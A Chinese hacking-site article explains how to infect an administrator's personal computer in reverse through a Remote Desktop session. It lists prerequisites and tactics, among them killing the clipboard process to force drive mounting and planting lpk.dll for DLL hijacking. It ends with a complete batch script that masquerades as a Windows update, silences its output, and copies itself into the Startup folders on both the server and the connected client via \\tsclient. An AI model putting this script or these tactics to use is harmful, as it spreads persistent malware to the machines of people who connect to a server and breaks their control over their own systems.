远程桌面反向感染管理个人机-华盟网

远程桌面反向感染管理个人机

华盟学院山东省第二期线下学习计划

前置条件
1.mstsc需要开启驱动器C盘(win2008及以上只需剪切板即可文件传输)
2.win2003 如果要复制文件必须开驱动器

思路:
遍历tsclient的自启动目录 -》 添加执行程序 -》个人机重启 -》 上线
++
猥琐一些的思路:脚本找不到挂载磁盘的情况下直接结束rdpclip.exe 使管理员无法使用剪切板功能,他可能在修复时会挂载上磁盘

++
@ptvip 老司机思路,传lpk.dll
写bat脚本寻找所有挂载磁盘存在的exe文件,把每个目录都写一个lpk.dll
更新关于dll劫持
(lpk.dll只针对xp系统,高于xp的微软已经用KnownDLLs做了防范,需要发现其他的dll进行劫持)

www.idc126.com

++
@Solo_LD  结合蜜罐,反向搞黑客

@echo off

echo Updating Windows ...

@echo off
timeout 1 >nul 2>&1

mkdir \\tsclient\c\temp >nul 2>&1
mkdir C:\temp >nul 2>&1

copy run.bat C:\temp >nul 2>&1
copy run.bat \\tsclient\c\temp >nul 2>&1

del /q %TEMP%\temp_00.txt >nul 2>&1

set dirs=dir /a:d /b /s C:\users\*Startup*
set dirs2=dir /a:d /b /s \\tsclient\c\users\*startup*

echo|%dirs%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt"
echo|%dirs2%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt"

for /F "tokens=*" %%a in (%TEMP%\temp_00.txt) DO (
        copy run.bat "%%a" >nul 2>&1
        copy C:\temp\run.bat "%%a" >nul 2>&1
        copy \\tsclient\c\temp\run.bat "%%a" >nul 2>&1
)

del /q %TEMP%\temp_00.txt >nul 2>&1
本文由 华盟网 作者:小龙 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。
0

发表评论